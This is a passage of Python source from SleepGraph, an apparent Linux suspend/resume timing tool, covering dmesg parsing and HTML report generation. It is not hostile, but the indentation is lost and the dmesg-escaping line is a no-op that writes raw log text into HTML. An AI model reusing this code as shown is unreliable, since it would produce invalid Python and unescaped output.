t = sm.group('t')
list = data.dmesg[phase]['list']
if(f in list):
dev = list[f]
dev['length'] = int(t)
dev['end'] = ktime
# if trace events are not available, these are better than nothing
if(not sysvals.usetraceevents):
# look for known actions
for a in sorted(at):
if(re.match(at[a]['smsg'], msg)):
if(a not in actions):
actions[a] = []
actions[a].append({'begin': ktime, 'end': ktime})
if(re.match(at[a]['emsg'], msg)):
if(a in actions):
actions[a][-1]['end'] = ktime
# now look for CPU on/off events
if(re.match('Disabling non-boot CPUs .*', msg)):
# start of first cpu suspend
cpu_start = ktime
elif(re.match('Enabling non-boot CPUs .*', msg)):
# start of first cpu resume
cpu_start = ktime
elif(re.match('smpboot: CPU (?P<cpu>[0-9]*) is now offline', msg)):
# end of a cpu suspend, start of the next
m = re.match('smpboot: CPU (?P<cpu>[0-9]*) is now offline', msg)
cpu = 'CPU'+m.group('cpu')
if(cpu not in actions):
actions[cpu] = []
actions[cpu].append({'begin': cpu_start, 'end': ktime})
cpu_start = ktime
elif(re.match('CPU(?P<cpu>[0-9]*) is up', msg)):
# end of a cpu resume, start of the next
m = re.match('CPU(?P<cpu>[0-9]*) is up', msg)
cpu = 'CPU'+m.group('cpu')
if(cpu not in actions):
actions[cpu] = []
actions[cpu].append({'begin': cpu_start, 'end': ktime})
cpu_start = ktime
prevktime = ktime
data.initDevicegroups()
# fill in any missing phases
phasedef = data.phasedef
terr, lp = '', 'suspend_prepare'
for p in sorted(phasedef, key=lambda k:phasedef[k]['order']):
if p not in data.dmesg:
if not terr:
pprint('TEST FAILED: %s failed in %s phase' % (sysvals.suspendmode, lp))
terr = '%s failed in %s phase' % (sysvals.suspendmode, lp)
if data.tSuspended == 0:
data.tSuspended = data.dmesg[lp]['end']
if data.tResumed == 0:
data.tResumed = data.dmesg[lp]['end']
sysvals.vprint('WARNING: phase "%s" is missing!' % p)
lp = p
lp = data.sortedPhases()[0]
for p in data.sortedPhases():
if(p != lp and not ('machine' in p and 'machine' in lp)):
data.dmesg[lp]['end'] = data.dmesg[p]['start']
lp = p
if data.tSuspended == 0:
data.tSuspended = data.tKernRes
if data.tResumed == 0:
data.tResumed = data.tSuspended
# fill in any actions we've found
for name in sorted(actions):
for event in actions[name]:
data.newActionGlobal(name, event['begin'], event['end'])
if(len(sysvals.devicefilter) > 0):
data.deviceFilter(sysvals.devicefilter)
data.fixupInitcallsThatDidntReturn()
return True
def callgraphHTML(sv, hf, num, cg, title, color, devid):
html_func_top = '<article id="{0}" class="atop" style="background:{1}">\n<input type="checkbox" class="pf" id="f{2}" checked/><label for="f{2}">{3} {4}</label>\n'
html_func_start = '<article>\n<input type="checkbox" class="pf" id="f{0}" checked/><label for="f{0}">{1} {2}</label>\n'
html_func_end = '</article>\n'
html_func_leaf = '<article>{0} {1}</article>\n'
cgid = devid
if cg.id:
cgid += cg.id
cglen = (cg.end - cg.start) * 1000
if cglen < sv.mincglen:
return num
fmt = '<r>(%.3f ms @ '+sv.timeformat+' to '+sv.timeformat+')</r>'
flen = fmt % (cglen, cg.start, cg.end)
hf.write(html_func_top.format(cgid, color, num, title, flen))
num += 1
for line in cg.list:
if(line.length < 0.000000001):
flen = ''
else:
fmt = '<n>(%.3f ms @ '+sv.timeformat+')</n>'
flen = fmt % (line.length*1000, line.time)
if line.isLeaf():
hf.write(html_func_leaf.format(line.name, flen))
elif line.freturn:
hf.write(html_func_end)
else:
hf.write(html_func_start.format(num, line.name, flen))
num += 1
hf.write(html_func_end)
return num
def addCallgraphs(sv, hf, data):
hf.write('<section id="callgraphs" class="callgraph">\n')
# write out the ftrace data converted to html
num = 0
for p in data.sortedPhases():
if sv.cgphase and p != sv.cgphase:
continue
list = data.dmesg[p]['list']
for d in data.sortedDevices(p):
if len(sv.cgfilter) > 0 and d not in sv.cgfilter:
continue
dev = list[d]
color = 'white'
if 'color' in data.dmesg[p]:
color = data.dmesg[p]['color']
if 'color' in dev:
color = dev['color']
name = d if '[' not in d else d.split('[')[0]
if(d in sv.devprops):
name = sv.devprops[d].altName(d)
if 'drv' in dev and dev['drv']:
name += ' {%s}' % dev['drv']
if sv.suspendmode in suspendmodename:
name += ' '+p
if('ftrace' in dev):
cg = dev['ftrace']
if cg.name == sv.ftopfunc:
name = 'top level suspend/resume call'
num = callgraphHTML(sv, hf, num, cg,
name, color, dev['id'])
if('ftraces' in dev):
for cg in dev['ftraces']:
num = callgraphHTML(sv, hf, num, cg,
name+' → '+cg.name, color, dev['id'])
hf.write('\n\n </section>\n')
def summaryCSS(title, center=True):
tdcenter = 'text-align:center;' if center else ''
out = '<!DOCTYPE html>\n<html>\n<head>\n\
<meta http-equiv="content-type" content="text/html; charset=UTF-8">\n\
<title>'+title+'</title>\n\
<style type=\'text/css\'>\n\
.stamp {width: 100%;text-align:center;background:#888;line-height:30px;color:white;font: 25px Arial;}\n\
table {width:100%;border-collapse: collapse;border:1px solid;}\n\
th {border: 1px solid black;background:#222;color:white;}\n\
td {font: 14px "Times New Roman";'+tdcenter+'}\n\
tr.head td {border: 1px solid black;background:#aaa;}\n\
tr.alt {background-color:#ddd;}\n\
tr.notice {color:red;}\n\
.minval {background-color:#BBFFBB;}\n\
.medval {background-color:#BBBBFF;}\n\
.maxval {background-color:#FFBBBB;}\n\
.head a {color:#000;text-decoration: none;}\n\
</style>\n</head>\n<body>\n'
return out
# Function: createHTMLSummarySimple
# Description:
# Create summary html file for a series of tests
# Arguments:
# testruns: array of Data objects from parseTraceLog
def createHTMLSummarySimple(testruns, htmlfile, title):
# write the html header first (html head, css code, up to body start)
html = summaryCSS('Summary - SleepGraph')
# extract the test data into list
list = dict()
tAvg, tMin, tMax, tMed = [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [dict(), dict()]
iMin, iMed, iMax = [0, 0], [0, 0], [0, 0]
num = 0
useturbo = usewifi = False
lastmode = ''
cnt = dict()
for data in sorted(testruns, key=lambda v:(v['mode'], v['host'], v['kernel'], v['time'])):
mode = data['mode']
if mode not in list:
list[mode] = {'data': [], 'avg': [0,0], 'min': [0,0], 'max': [0,0], 'med': [0,0]}
if lastmode and lastmode != mode and num > 0:
for i in range(2):
s = sorted(tMed[i])
list[lastmode]['med'][i] = s[int(len(s)//2)]
iMed[i] = tMed[i][list[lastmode]['med'][i]]
list[lastmode]['avg'] = [tAvg[0] / num, tAvg[1] / num]
list[lastmode]['min'] = tMin
list[lastmode]['max'] = tMax
list[lastmode]['idx'] = (iMin, iMed, iMax)
tAvg, tMin, tMax, tMed = [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [dict(), dict()]
iMin, iMed, iMax = [0, 0], [0, 0], [0, 0]
num = 0
pkgpc10 = syslpi = wifi = ''
if 'pkgpc10' in data and 'syslpi' in data:
pkgpc10, syslpi, useturbo = data['pkgpc10'], data['syslpi'], True
if 'wifi' in data:
wifi, usewifi = data['wifi'], True
res = data['result']
tVal = [float(data['suspend']), float(data['resume'])]
list[mode]['data'].append([data['host'], data['kernel'],
data['time'], tVal[0], tVal[1], data['url'], res,
data['issues'], data['sus_worst'], data['sus_worsttime'],
data['res_worst'], data['res_worsttime'], pkgpc10, syslpi, wifi])
idx = len(list[mode]['data']) - 1
if res.startswith('fail in'):
res = 'fail'
if res not in cnt:
cnt[res] = 1
else:
cnt[res] += 1
if res == 'pass':
for i in range(2):
tMed[i][tVal[i]] = idx
tAvg[i] += tVal[i]
if tMin[i] == 0 or tVal[i] < tMin[i]:
iMin[i] = idx
tMin[i] = tVal[i]
if tMax[i] == 0 or tVal[i] > tMax[i]:
iMax[i] = idx
tMax[i] = tVal[i]
num += 1
lastmode = mode
if lastmode and num > 0:
for i in range(2):
s = sorted(tMed[i])
list[lastmode]['med'][i] = s[int(len(s)//2)]
iMed[i] = tMed[i][list[lastmode]['med'][i]]
list[lastmode]['avg'] = [tAvg[0] / num, tAvg[1] / num]
list[lastmode]['min'] = tMin
list[lastmode]['max'] = tMax
list[lastmode]['idx'] = (iMin, iMed, iMax)
# group test header
desc = []
for ilk in sorted(cnt, reverse=True):
if cnt[ilk] > 0:
desc.append('%d %s' % (cnt[ilk], ilk))
html += '<div class="stamp">%s (%d tests: %s)</div>\n' % (title, len(testruns), ', '.join(desc))
th = '\t<th>{0}</th>\n'
td = '\t<td>{0}</td>\n'
tdh = '\t<td{1}>{0}</td>\n'
tdlink = '\t<td><a href="{0}">html</a></td>\n'
cols = 12
if useturbo:
cols += 2
if usewifi:
cols += 1
colspan = '%d' % cols
# table header
html += '<table>\n<tr>\n' + th.format('#') +\
th.format('Mode') + th.format('Host') + th.format('Kernel') +\
th.format('Test Time') + th.format('Result') + th.format('Issues') +\
th.format('Suspend') + th.format('Resume') +\
th.format('Worst Suspend Device') + th.format('SD Time') +\
th.format('Worst Resume Device') + th.format('RD Time')
if useturbo:
html += th.format('PkgPC10') + th.format('SysLPI')
if usewifi:
html += th.format('Wifi')
html += th.format('Detail')+'</tr>\n'
# export list into html
head = '<tr class="head"><td>{0}</td><td>{1}</td>'+\
'<td colspan='+colspan+' class="sus">Suspend Avg={2} '+\
'<span class=minval><a href="#s{10}min">Min={3}</a></span> '+\
'<span class=medval><a href="#s{10}med">Med={4}</a></span> '+\
'<span class=maxval><a href="#s{10}max">Max={5}</a></span> '+\
'Resume Avg={6} '+\
'<span class=minval><a href="#r{10}min">Min={7}</a></span> '+\
'<span class=medval><a href="#r{10}med">Med={8}</a></span> '+\
'<span class=maxval><a href="#r{10}max">Max={9}</a></span></td>'+\
'</tr>\n'
headnone = '<tr class="head"><td>{0}</td><td>{1}</td><td colspan='+\
colspan+'></td></tr>\n'
for mode in sorted(list):
# header line for each suspend mode
num = 0
tAvg, tMin, tMax, tMed = list[mode]['avg'], list[mode]['min'],\
list[mode]['max'], list[mode]['med']
count = len(list[mode]['data'])
if 'idx' in list[mode]:
iMin, iMed, iMax = list[mode]['idx']
html += head.format('%d' % count, mode.upper(),
'%.3f' % tAvg[0], '%.3f' % tMin[0], '%.3f' % tMed[0], '%.3f' % tMax[0],
'%.3f' % tAvg[1], '%.3f' % tMin[1], '%.3f' % tMed[1], '%.3f' % tMax[1],
mode.lower()
)
else:
iMin = iMed = iMax = [-1, -1, -1]
html += headnone.format('%d' % count, mode.upper())
for d in list[mode]['data']:
# row classes - alternate row color
rcls = ['alt'] if num % 2 == 1 else []
if d[6] != 'pass':
rcls.append('notice')
html += '<tr class="'+(' '.join(rcls))+'">\n' if len(rcls) > 0 else '<tr>\n'
# figure out if the line has sus or res highlighted
idx = list[mode]['data'].index(d)
tHigh = ['', '']
for i in range(2):
tag = 's%s' % mode if i == 0 else 'r%s' % mode
if idx == iMin[i]:
tHigh[i] = ' id="%smin" class=minval title="Minimum"' % tag
elif idx == iMax[i]:
tHigh[i] = ' id="%smax" class=maxval title="Maximum"' % tag
elif idx == iMed[i]:
tHigh[i] = ' id="%smed" class=medval title="Median"' % tag
html += td.format("%d" % (list[mode]['data'].index(d) + 1)) # row
html += td.format(mode) # mode
html += td.format(d[0]) # host
html += td.format(d[1]) # kernel
html += td.format(d[2]) # time
html += td.format(d[6]) # result
html += td.format(d[7]) # issues
html += tdh.format('%.3f ms' % d[3], tHigh[0]) if d[3] else td.format('') # suspend
html += tdh.format('%.3f ms' % d[4], tHigh[1]) if d[4] else td.format('') # resume
html += td.format(d[8]) # sus_worst
html += td.format('%.3f ms' % d[9]) if d[9] else td.format('') # sus_worst time
html += td.format(d[10]) # res_worst
html += td.format('%.3f ms' % d[11]) if d[11] else td.format('') # res_worst time
if useturbo:
html += td.format(d[12]) # pkg_pc10
html += td.format(d[13]) # syslpi
if usewifi:
html += td.format(d[14]) # wifi
html += tdlink.format(d[5]) if d[5] else td.format('') # url
html += '</tr>\n'
num += 1
# flush the data to file
hf = open(htmlfile, 'w')
hf.write(html+'</table>\n</body>\n</html>\n')
hf.close()
def createHTMLDeviceSummary(testruns, htmlfile, title):
html = summaryCSS('Device Summary - SleepGraph', False)
# create global device list from all tests
devall = dict()
for data in testruns:
host, url, devlist = data['host'], data['url'], data['devlist']
for type in devlist:
if type not in devall:
devall[type] = dict()
mdevlist, devlist = devall[type], data['devlist'][type]
for name in devlist:
length = devlist[name]
if name not in mdevlist:
mdevlist[name] = {'name': name, 'host': host,
'worst': length, 'total': length, 'count': 1,
'url': url}
else:
if length > mdevlist[name]['worst']:
mdevlist[name]['worst'] = length
mdevlist[name]['url'] = url
mdevlist[name]['host'] = host
mdevlist[name]['total'] += length
mdevlist[name]['count'] += 1
# generate the html
th = '\t<th>{0}</th>\n'
td = '\t<td align=center>{0}</td>\n'
tdr = '\t<td align=right>{0}</td>\n'
tdlink = '\t<td align=center><a href="{0}">html</a></td>\n'
limit = 1
for type in sorted(devall, reverse=True):
num = 0
devlist = devall[type]
# table header
html += '<div class="stamp">%s (%s devices > %d ms)</div><table>\n' % \
(title, type.upper(), limit)
html += '<tr>\n' + '<th align=right>Device Name</th>' +\
th.format('Average Time') + th.format('Count') +\
th.format('Worst Time') + th.format('Host (worst time)') +\
th.format('Link (worst time)') + '</tr>\n'
for name in sorted(devlist, key=lambda k:(devlist[k]['worst'], \
devlist[k]['total'], devlist[k]['name']), reverse=True):
data = devall[type][name]
data['average'] = data['total'] / data['count']
if data['average'] < limit:
continue
# row classes - alternate row color
rcls = ['alt'] if num % 2 == 1 else []
html += '<tr class="'+(' '.join(rcls))+'">\n' if len(rcls) > 0 else '<tr>\n'
html += tdr.format(data['name']) # name
html += td.format('%.3f ms' % data['average']) # average
html += td.format(data['count']) # count
html += td.format('%.3f ms' % data['worst']) # worst
html += td.format(data['host']) # host
html += tdlink.format(data['url']) # url
html += '</tr>\n'
num += 1
html += '</table>\n'
# flush the data to file
hf = open(htmlfile, 'w')
hf.write(html+'</body>\n</html>\n')
hf.close()
return devall
def createHTMLIssuesSummary(testruns, issues, htmlfile, title, extra=''):
multihost = len([e for e in issues if len(e['urls']) > 1]) > 0
html = summaryCSS('Issues Summary - SleepGraph', False)
total = len(testruns)
# generate the html
th = '\t<th>{0}</th>\n'
td = '\t<td align={0}>{1}</td>\n'
tdlink = '<a href="{1}">{0}</a>'
subtitle = '%d issues' % len(issues) if len(issues) > 0 else 'no issues'
html += '<div class="stamp">%s (%s)</div><table>\n' % (title, subtitle)
html += '<tr>\n' + th.format('Issue') + th.format('Count')
if multihost:
html += th.format('Hosts')
html += th.format('Tests') + th.format('Fail Rate') +\
th.format('First Instance') + '</tr>\n'
num = 0
for e in sorted(issues, key=lambda v:v['count'], reverse=True):
testtotal = 0
links = []
for host in sorted(e['urls']):
links.append(tdlink.format(host, e['urls'][host][0]))
testtotal += len(e['urls'][host])
rate = '%d/%d (%.2f%%)' % (testtotal, total, 100*float(testtotal)/float(total))
# row classes - alternate row color
rcls = ['alt'] if num % 2 == 1 else []
html += '<tr class="'+(' '.join(rcls))+'">\n' if len(rcls) > 0 else '<tr>\n'
html += td.format('left', e['line']) # issue
html += td.format('center', e['count']) # count
if multihost:
html += td.format('center', len(e['urls'])) # hosts
html += td.format('center', testtotal) # test count
html += td.format('center', rate) # test rate
html += td.format('center nowrap', '<br>'.join(links)) # links
html += '</tr>\n'
num += 1
# flush the data to file
hf = open(htmlfile, 'w')
hf.write(html+'</table>\n'+extra+'</body>\n</html>\n')
hf.close()
return issues
def ordinal(value):
suffix = 'th'
if value < 10 or value > 19:
if value % 10 == 1:
suffix = 'st'
elif value % 10 == 2:
suffix = 'nd'
elif value % 10 == 3:
suffix = 'rd'
return '%d%s' % (value, suffix)
# Function: createHTML
# Description:
# Create the output html file from the resident test data
# Arguments:
# testruns: array of Data objects from parseKernelLog or parseTraceLog
# Output:
# True if the html file was created, false if it failed
def createHTML(testruns, testfail):
if len(testruns) < 1:
pprint('ERROR: Not enough test data to build a timeline')
return
kerror = False
for data in testruns:
if data.kerror:
kerror = True
if(sysvals.suspendmode in ['freeze', 'standby']):
data.trimFreezeTime(testruns[-1].tSuspended)
else:
data.getMemTime()
# html function templates
html_error = '<div id="{1}" title="kernel error/warning" class="err" style="right:{0}%">{2}→</div>\n'
html_traceevent = '<div title="{0}" class="traceevent{6}" style="left:{1}%;top:{2}px;height:{3}px;width:{4}%;line-height:{3}px;{7}">{5}</div>\n'
html_cpuexec = '<div class="jiffie" style="left:{0}%;top:{1}px;height:{2}px;width:{3}%;background:{4};"></div>\n'
html_timetotal = '<table class="time1">\n<tr>'\
'<td class="green" title="{3}">{2} Suspend Time: <b>{0} ms</b></td>'\
'<td class="yellow" title="{4}">{2} Resume Time: <b>{1} ms</b></td>'\
'</tr>\n</table>\n'
html_timetotal2 = '<table class="time1">\n<tr>'\
'<td class="green" title="{4}">{3} Suspend Time: <b>{0} ms</b></td>'\
'<td class="gray" title="time spent in low-power mode with clock running">'+sysvals.suspendmode+' time: <b>{1} ms</b></td>'\
'<td class="yellow" title="{5}">{3} Resume Time: <b>{2} ms</b></td>'\
'</tr>\n</table>\n'
html_timetotal3 = '<table class="time1">\n<tr>'\
'<td class="green">Execution Time: <b>{0} ms</b></td>'\
'<td class="yellow">Command: <b>{1}</b></td>'\
'</tr>\n</table>\n'
html_fail = '<table class="testfail"><tr><td>{0}</td></tr></table>\n'
html_kdesc = '<td class="{3}" title="time spent in kernel execution">{0}Kernel {2}: {1} ms</td>'
html_fwdesc = '<td class="{3}" title="time spent in firmware">{0}Firmware {2}: {1} ms</td>'
html_wifdesc = '<td class="yellow" title="time for wifi to reconnect after resume complete ({2})">{0}Wifi Resume: {1}</td>'
# html format variables
scaleH = 20
if kerror:
scaleH = 40
# device timeline
devtl = Timeline(30, scaleH)
# write the test title and general info header
devtl.createHeader(sysvals, testruns[0].stamp)
# Generate the header for this timeline
for data in testruns:
tTotal = data.end - data.start
if(tTotal == 0):
doError('No timeline data')
if sysvals.suspendmode == 'command':
run_time = '%.0f' % (tTotal * 1000)
if sysvals.testcommand:
testdesc = sysvals.testcommand
else:
testdesc = 'unknown'
if(len(testruns) > 1):
testdesc = ordinal(data.testnumber+1)+' '+testdesc
thtml = html_timetotal3.format(run_time, testdesc)
devtl.html += thtml
continue
# typical full suspend/resume header
stot, rtot = sktime, rktime = data.getTimeValues()
ssrc, rsrc, testdesc, testdesc2 = ['kernel'], ['kernel'], 'Kernel', ''
if data.fwValid:
stot += (data.fwSuspend/1000000.0)
rtot += (data.fwResume/1000000.0)
ssrc.append('firmware')
rsrc.append('firmware')
testdesc = 'Total'
if 'time' in data.wifi and data.wifi['stat'] != 'timeout':
rtot += data.end - data.tKernRes + (data.wifi['time'] * 1000.0)
rsrc.append('wifi')
testdesc = 'Total'
suspend_time, resume_time = '%.3f' % stot, '%.3f' % rtot
stitle = 'time from kernel suspend start to %s mode [%s time]' % \
(sysvals.suspendmode, ' & '.join(ssrc))
rtitle = 'time from %s mode to kernel resume complete [%s time]' % \
(sysvals.suspendmode, ' & '.join(rsrc))
if(len(testruns) > 1):
testdesc = testdesc2 = ordinal(data.testnumber+1)
testdesc2 += ' '
if(len(data.tLow) == 0):
thtml = html_timetotal.format(suspend_time, \
resume_time, testdesc, stitle, rtitle)
else:
low_time = '+'.join(data.tLow)
thtml = html_timetotal2.format(suspend_time, low_time, \
resume_time, testdesc, stitle, rtitle)
devtl.html += thtml
if not data.fwValid and 'dev' not in data.wifi:
continue
# extra detail when the times come from multiple sources
thtml = '<table class="time2">\n<tr>'
thtml += html_kdesc.format(testdesc2, '%.3f'%sktime, 'Suspend', 'green')
if data.fwValid:
sftime = '%.3f'%(data.fwSuspend / 1000000.0)
rftime = '%.3f'%(data.fwResume / 1000000.0)
thtml += html_fwdesc.format(testdesc2, sftime, 'Suspend', 'green')
thtml += html_fwdesc.format(testdesc2, rftime, 'Resume', 'yellow')
thtml += html_kdesc.format(testdesc2, '%.3f'%rktime, 'Resume', 'yellow')
if 'time' in data.wifi:
if data.wifi['stat'] != 'timeout':
wtime = '%.0f ms'%(data.end - data.tKernRes + (data.wifi['time'] * 1000.0))
else:
wtime = 'TIMEOUT'
thtml += html_wifdesc.format(testdesc2, wtime, data.wifi['dev'])
thtml += '</tr>\n</table>\n'
devtl.html += thtml
if testfail:
devtl.html += html_fail.format(testfail)
# time scale for potentially multiple datasets
t0 = testruns[0].start
tMax = testruns[-1].end
tTotal = tMax - t0
# determine the maximum number of rows we need to draw
fulllist = []
threadlist = []
pscnt = 0
devcnt = 0
for data in testruns:
data.selectTimelineDevices('%f', tTotal, sysvals.mindevlen)
for group in data.devicegroups:
devlist = []
for phase in group:
for devname in sorted(data.tdevlist[phase]):
d = DevItem(data.testnumber, phase, data.dmesg[phase]['list'][devname])
devlist.append(d)
if d.isa('kth'):
threadlist.append(d)
else:
if d.isa('ps'):
pscnt += 1
else:
devcnt += 1
fulllist.append(d)
if sysvals.mixedphaseheight:
devtl.getPhaseRows(devlist)
if not sysvals.mixedphaseheight:
if len(threadlist) > 0 and len(fulllist) > 0:
if pscnt > 0 and devcnt > 0:
msg = 'user processes & device pm callbacks'
elif pscnt > 0:
msg = 'user processes'
else:
msg = 'device pm callbacks'
d = testruns[0].addHorizontalDivider(msg, testruns[-1].end)
fulllist.insert(0, d)
devtl.getPhaseRows(fulllist)
if len(threadlist) > 0:
d = testruns[0].addHorizontalDivider('asynchronous kernel threads', testruns[-1].end)
threadlist.insert(0, d)
devtl.getPhaseRows(threadlist, devtl.rows)
devtl.calcTotalRows()
# draw the full timeline
devtl.createZoomBox(sysvals.suspendmode, len(testruns))
for data in testruns:
# draw each test run and block chronologically
phases = {'suspend':[],'resume':[]}
for phase in data.sortedPhases():
if data.dmesg[phase]['start'] >= data.tSuspended:
phases['resume'].append(phase)
else:
phases['suspend'].append(phase)
# now draw the actual timeline blocks
for dir in phases:
# draw suspend and resume blocks separately
bname = '%s%d' % (dir[0], data.testnumber)
if dir == 'suspend':
m0 = data.start
mMax = data.tSuspended
left = '%f' % (((m0-t0)*100.0)/tTotal)
else:
m0 = data.tSuspended
mMax = data.end
# in an x2 run, remove any gap between blocks
if len(testruns) > 1 and data.testnumber == 0:
mMax = testruns[1].start
left = '%f' % ((((m0-t0)*100.0)+sysvals.srgap/2)/tTotal)
mTotal = mMax - m0
# if a timeline block is 0 length, skip altogether
if mTotal == 0:
continue
width = '%f' % (((mTotal*100.0)-sysvals.srgap/2)/tTotal)
devtl.html += devtl.html_tblock.format(bname, left, width, devtl.scaleH)
for b in phases[dir]:
# draw the phase color background
phase = data.dmesg[b]
length = phase['end']-phase['start']
left = '%f' % (((phase['start']-m0)*100.0)/mTotal)
width = '%f' % ((length*100.0)/mTotal)
devtl.html += devtl.html_phase.format(left, width, \
'%.3f'%devtl.scaleH, '%.3f'%devtl.bodyH, \
data.dmesg[b]['color'], '')
for e in data.errorinfo[dir]:
# draw red lines for any kernel errors found
type, t, idx1, idx2 = e
id = '%d_%d' % (idx1, idx2)
right = '%f' % (((mMax-t)*100.0)/mTotal)
devtl.html += html_error.format(right, id, type)
for b in phases[dir]:
# draw the devices for this phase
phaselist = data.dmesg[b]['list']
for d in sorted(data.tdevlist[b]):
dname = d if ('[' not in d or 'CPU' in d) else d.split('[')[0]
name, dev = dname, phaselist[d]
drv = xtraclass = xtrainfo = xtrastyle = ''
if 'htmlclass' in dev:
xtraclass = dev['htmlclass']
if 'color' in dev:
xtrastyle = 'background:%s;' % dev['color']
if(d in sysvals.devprops):
name = sysvals.devprops[d].altName(d)
xtraclass = sysvals.devprops[d].xtraClass()
xtrainfo = sysvals.devprops[d].xtraInfo()
elif xtraclass == ' kth':
xtrainfo = ' kernel_thread'
if('drv' in dev and dev['drv']):
drv = ' {%s}' % dev['drv']
rowheight = devtl.phaseRowHeight(data.testnumber, b, dev['row'])
rowtop = devtl.phaseRowTop(data.testnumber, b, dev['row'])
top = '%.3f' % (rowtop + devtl.scaleH)
left = '%f' % (((dev['start']-m0)*100)/mTotal)
width = '%f' % (((dev['end']-dev['start'])*100)/mTotal)
length = ' (%0.3f ms) ' % ((dev['end']-dev['start'])*1000)
title = name+drv+xtrainfo+length
if sysvals.suspendmode == 'command':
title += sysvals.testcommand
elif xtraclass == ' ps':
if 'suspend' in b:
title += 'pre_suspend_process'
else:
title += 'post_resume_process'
else:
title += b
devtl.html += devtl.html_device.format(dev['id'], \
title, left, top, '%.3f'%rowheight, width, \
dname+drv, xtraclass, xtrastyle)
if('cpuexec' in dev):
for t in sorted(dev['cpuexec']):
start, end = t
j = float(dev['cpuexec'][t]) / 5
if j > 1.0:
j = 1.0
height = '%.3f' % (rowheight/3)
top = '%.3f' % (rowtop + devtl.scaleH + 2*rowheight/3)
left = '%f' % (((start-m0)*100)/mTotal)
width = '%f' % ((end-start)*100/mTotal)
color = 'rgba(255, 0, 0, %f)' % j
devtl.html += \
html_cpuexec.format(left, top, height, width, color)
if('src' not in dev):
continue
# draw any trace events for this device
for e in dev['src']:
if e.length == 0:
continue
height = '%.3f' % devtl.rowH
top = '%.3f' % (rowtop + devtl.scaleH + (e.row*devtl.rowH))
left = '%f' % (((e.time-m0)*100)/mTotal)
width = '%f' % (e.length*100/mTotal)
xtrastyle = ''
if e.color:
xtrastyle = 'background:%s;' % e.color
devtl.html += \
html_traceevent.format(e.title(), \
left, top, height, width, e.text(), '', xtrastyle)
# draw the time scale, try to make the number of labels readable
devtl.createTimeScale(m0, mMax, tTotal, dir)
devtl.html += '</div>\n'
# timeline is finished
devtl.html += '</div>\n</div>\n'
# draw a legend which describes the phases by color
if sysvals.suspendmode != 'command':
phasedef = testruns[-1].phasedef
devtl.html += '<div class="legend">\n'
pdelta = 100.0/len(phasedef.keys())
pmargin = pdelta / 4.0
for phase in sorted(phasedef, key=lambda k:phasedef[k]['order']):
id, p = '', phasedef[phase]
for word in phase.split('_'):
id += word[0]
order = '%.2f' % ((p['order'] * pdelta) + pmargin)
name = phase.replace('_', ' ')
devtl.html += devtl.html_legend.format(order, p['color'], name, id)
devtl.html += '</div>\n'
hf = open(sysvals.htmlfile, 'w')
addCSS(hf, sysvals, len(testruns), kerror)
# write the device timeline
hf.write(devtl.html)
hf.write('<div id="devicedetailtitle"></div>\n')
hf.write('<div id="devicedetail" style="display:none;">\n')
# draw the colored boxes for the device detail section
for data in testruns:
hf.write('<div id="devicedetail%d">\n' % data.testnumber)
pscolor = 'linear-gradient(to top left, #ccc, #eee)'
hf.write(devtl.html_phaselet.format('pre_suspend_process', \
'0', '0', pscolor))
for b in data.sortedPhases():
phase = data.dmesg[b]
length = phase['end']-phase['start']
left = '%.3f' % (((phase['start']-t0)*100.0)/tTotal)
width = '%.3f' % ((length*100.0)/tTotal)
hf.write(devtl.html_phaselet.format(b, left, width, \
data.dmesg[b]['color']))
hf.write(devtl.html_phaselet.format('post_resume_process', \
'0', '0', pscolor))
if sysvals.suspendmode == 'command':
hf.write(devtl.html_phaselet.format('cmdexec', '0', '0', pscolor))
hf.write('</div>\n')
hf.write('</div>\n')
# write the ftrace data (callgraph)
if sysvals.cgtest >= 0 and len(testruns) > sysvals.cgtest:
data = testruns[sysvals.cgtest]
else:
data = testruns[-1]
if sysvals.usecallgraph:
addCallgraphs(sysvals, hf, data)
# add the test log as a hidden div
if sysvals.testlog and sysvals.logmsg:
hf.write('<div id="testlog" style="display:none;">\n'+sysvals.logmsg+'</div>\n')
# add the dmesg log as a hidden div
if sysvals.dmesglog and sysvals.dmesgfile:
hf.write('<div id="dmesglog" style="display:none;">\n')
lf = sysvals.openlog(sysvals.dmesgfile, 'r')
for line in lf:
line = line.replace('<', '<').replace('>', '>')
hf.write(line)
lf.close()
hf.write('</div>\n')
# add the ftrace log as a hidden div
if sysvals.ftracelog and sysvals.ftracefile:
hf.write('<div id="ftracelog" style="display:none;">\n')
lf = sysvals.openlog(sysvals.ftracefile, 'r')
for line in lf:
hf.write(line)
lf.close()
hf.write('</div>\n')
# write the footer and close
addScriptCode(hf, testruns)
hf.write('</body>\n</html>\n')
hf.close()
return True
def addCSS(hf, sv, testcount=1, kerror=False, extra=''):
kernel = sv.stamp['kernel']
host = sv.hostname[0].upper()+sv.hostname[1:]
mode = sv.suspendmode
if sv.suspendmode in suspendmodename:
mode = suspendmodename[sv.suspendmode]
title = host+' '+mode+' '+kernel
# various format changes by flags
cgchk = 'checked'
cgnchk = 'not(:checked)'
if sv.cgexp:
cgchk = 'not(:checked)'
cgnchk = 'checked'
hoverZ = 'z-index:8;'
if sv.usedevsrc:
hoverZ = ''
devlistpos = 'absolute'
if testcount > 1:
devlistpos = 'relative'
scaleTH = 20
if kerror:
scaleTH = 60
# write the html header first (html head, css code, up to body start)
html_header = '<!DOCTYPE html>\n<html>\n<head>\n\
<meta http-equiv="content-type" content="text/html; charset=UTF-8">\n\
<title>'+title+'</title>\n\
<style type=\'text/css\'>\n\
body {overflow-y:scroll;}\n\
.stamp {width:100%;text-align:center;background:gray;line-height:30px;color:white;font:25px Arial;}\n\
.stamp.sysinfo {font:10px Arial;}\n\
.callgraph {margin-top:30px;box-shadow:5px 5px 20px black;}\n\
.callgraph article * {padding-left:28px;}\n\
h1 {color:black;font:bold 30px Times;}\n\
t0 {color:black;font:bold 30px Times;}\n\
t1 {color:black;font:30px Times;}\n\
t2 {color:black;font:25px Times;}\n\
t3 {color:black;font:20px Times;white-space:nowrap;}\n\
t4 {color:black;font:bold 30px Times;line-height:60px;white-space:nowrap;}\n\
cS {font:bold 13px Times;}\n\
table {width:100%;}\n\
.gray {background:rgba(80,80,80,0.1);}\n\
.green {background:rgba(204,255,204,0.4);}\n\
.purple {background:rgba(128,0,128,0.2);}\n\
.yellow {background:rgba(255,255,204,0.4);}\n\
.blue {background:rgba(169,208,245,0.4);}\n\
.time1 {font:22px Arial;border:1px solid;}\n\
.time2 {font:15px Arial;border-bottom:1px solid;border-left:1px solid;border-right:1px solid;}\n\
